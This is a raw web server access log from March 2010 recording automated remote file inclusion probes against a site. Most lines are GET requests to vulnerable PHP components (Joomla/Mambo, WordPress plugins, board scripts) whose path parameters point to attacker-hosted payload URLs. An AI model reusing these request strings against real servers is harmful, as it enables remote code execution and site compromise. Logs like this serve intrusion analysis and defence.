220.232.237.122 - - [03/Mar/2010:07:54:30 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:30 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:31 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:31 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:31 -0800] "GET /logs/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:55:21 -0800] "GET /logs/access_100131.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:55:24 -0800] "GET /logs/access_100131.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:55:30 -0800] "GET /logs/access_100131.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:07:55:46 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:07:55:46 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:07:55:47 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:07:56:27 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:56:52 -0800] "GET /logs/access_100202.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:56:52 -0800] "GET /logs/access_100202.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:57:45 -0800] "GET /logs/access_100224.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:57:45 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:57:46 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:57:55 -0800] "GET /logs/access_100202.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:07:58:20 -0800] "GET /skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:07:58:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:07:58:20 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:07:58:24 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:59:14 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:59:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:59:14 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:00:01 -0800] "GET /logs/access_100220.log%20%20//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:00:01 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:00:01 -0800] "GET /galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:08:00:37 -0800] "GET /?path%5Bdocroot%5D=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:08:00:42 -0800] "GET /logs//?path%5Bdocroot%5D=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:08:00:46 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:00:53 -0800] "GET /logs/access_100226.log%20%20//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:08:01:46 -0800] "GET /?path%5Bdocroot%5D=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:01:52 -0800] "GET /galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:02:07 -0800] "GET /logs/access_100226.log//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:16 -0800] "GET /logs/access_100223.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:16 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:17 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:30 -0800] "GET /logs/access_100223.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:30 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:08:03:31 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:08:04:03 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:08:04:40 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:06:54 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:06:54 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:06:54 -0800] "GET /logs/access_100214.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:07:07 -0800] "GET /logs/access_100220.log//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:07:07 -0800] "GET /galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:07:08 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:07:12 -0800] "GET /logs/access_100226.log//galeria.php?start=0&kategoria=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:07:45 -0800] "GET /logs/access_100215.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:08:07:50 -0800] "GET /logs/access_100213.log//modules/vwar/admin/admin.php?vwar_root=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:09:00 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:09:00 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:08:09:02 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.21.69 - - [03/Mar/2010:08:09:30 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.21.69 - - [03/Mar/2010:08:09:31 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.21.69 - - [03/Mar/2010:08:09:31 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:19 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:19 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:19 -0800] "GET /logs//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:20 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:20 -0800] "GET /logs//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:20 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:24 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:24 -0800] "GET /logs//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:11:24 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:08:12:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:08:12:25 -0800] "GET /logs/access_100123.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:08:12:27 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100123.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:08:12:28 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_100123.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:12:34 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:12:36 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:08:12:39 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:08:17:56 -0800] "GET /logs/access_100222.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:08:17:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:08:17:58 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:21:47 -0800] "GET //delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:21:47 -0800] "GET /logs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:21:47 -0800] "GET /logs/access_100129.log///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:48 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:48 -0800] "GET /logs///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:48 -0800] "GET /logs///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:48 -0800] "GET /logs/access_100217.log///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:50 -0800] "GET /logs/access_100217.log///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:22:50 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [03/Mar/2010:08:24:01 -0800] "GET / HTTP/1.1" 200 401 "http://www.macdomain.org/forums.php?m=posts&q=30" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.pixero.net"
62.141.56.136 - - [03/Mar/2010:08:24:17 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:24:17 -0800] "GET /logs/access_100217.log%20%20///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:24:18 -0800] "GET /logs///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:08:24:21 -0800] "GET /logs/access_100210.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:24:38 -0800] "GET /logs///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:24:40 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [03/Mar/2010:08:24:40 -0800] "GET /logs/access_100217.log%20%20///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://irlen.de/typo3conf/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:08:28:05 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:08:28:11 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:32:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:32:20 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:32:24 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:32:31 -0800] "GET /logs/access_100212.log%20%20//include/admin.lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:35 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:35 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:35 -0800] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:37 -0800] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:37 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:32:42 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:08 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:08 -0800] "GET /logs/access.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:09 -0800] "GET /logs/access.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:09 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:11 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:14 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:33:56 -0800] "GET /logs/access_100210.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:34:03 -0800] "GET /logs/access_100210.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
